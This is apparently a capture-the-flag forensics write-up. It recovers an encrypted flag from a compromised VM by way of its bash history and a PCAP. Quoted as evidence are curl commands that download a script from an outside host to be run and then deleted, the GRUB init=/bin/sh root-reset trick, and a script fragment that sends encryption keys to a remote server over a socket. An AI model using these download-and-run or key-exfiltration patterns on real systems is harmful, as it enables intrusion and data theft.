Tags: forensics pcap python
Rating:
In this challenge we were presented with an OVA archive. After importing and running the VM we had to reset the root password. A common method is to set `init=/bin/sh` in GRUB.
Then we extracted the relevant files from `/home` which had two users `prod` and `test`.
So let's find out what has happened on the system:
`.bash_history` for `test` had following entries:
```
curl http://192.168.1.38/clev.py > .s.py
curl http://192.168.1.38:8080/clev.py > .s.py
curl http://192.168.1.38:8888/clev.py > .s.py
curl http://192.168.1.38:1111/clev.py > .s.py
file .s.py
python3.7 .s.py
rm .s.py
...
```
so someone downloaded a file, executed it, then removed it. `secrets.txt.enc` is likely our candidate for the flag, which was encrypted in `/home/test/data`. Since we don't have the script we continue somewhere else.
`/home/prod` included a PCAP file. A quick filter for port 1111 revealed an obfuscated Python script. Some observations:
```
for x in o(16):
p=''.join(random.choices(C,k=16))
M.append(p)
```
Since p gets overwritten every iteration, only the last value for "p" is used in the encryption.
```
u=','.join(k for k in M)
u=W(u,"utf-8")
u=base64.b64encode(u)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(g)
s.sendall(W(Q.id,"utf-8"))
s.recv(1)
s.sendall(u)
```
This will send the keys to another server: 192.168.1.38:9999.
A quick look in the PCAP confirms this. It sends some ID for the machine then all 16 keys in base64 encoding:
`bVRHZWxqaERSS0FTS0toUSxGTHJzU0V2ZVFRaWxvUFJuLFhlZFhIWUJVSHBJWERCSlAsSU9HUEVyam9zeE5pUXJOTSxSenZwYkVVUkxkRmZhR0ZNLHZkQlZEQ3ZpeGpTaENRdnksRVFsY3NuVXR6Q0h5RlBITSxKa0RpamdBRmlWQldKYUx6LGdoY1BJT1NxQ2RDVHFPcEQsRG5lQ3dia0RIa29qcHBIbSxsVlJaUmVBbGFJekhnaXNjLE5kamNnVlZqaWlueGZ0Q0MsUmtnTHBSQ3FybmlicnFzTixremV3dGVBZ1BFWmRrelFKLEhucEdvVWVxY2tFcXhwUW0sTFNOV1JhclRoUmRpUExwTQ==`
Base64 decoding gives us the keys:
`mTGeljhDRKASKKhQ,FLrsSEveQQiloPRn,XedXHYBUHpIXDBJP,IOGPErjosxNiQrNM,RzvpbEURLdFfaGFM,vdBVDCvixjShCQvy,EQlcsnUtzCHyFPHM,JkDijgAFiVBWJaLz,ghcPIOSqCdCTqOpD,DneCwbkDHkojppHm,lVRZReAlaIzHgisc,NdjcgVVjiinxftCC,RkgLpRCqrnibrqsN,kzewteAgPEZdkzQJ,HnpGoUeqckEqxpQm,LSNWRarThRdiPLpM`
So in order to decrypt the file we take the last key (LSNWRarThRdiPLpM) from the 16.
```
>>> f=open("secrets.txt.enc", "rb")
>>> f1=f.read()
>>> from Crypto.Cipher import AES
>>> c=AES.new("LSNWRarThRdiPLpM",AES.MODE_ECB)
>>> c.decrypt(f1)
b'flag{26c08ad080830d6dcd76c15009ab6b03}\n\t\t\t\t\t\t\t\t\t'
```
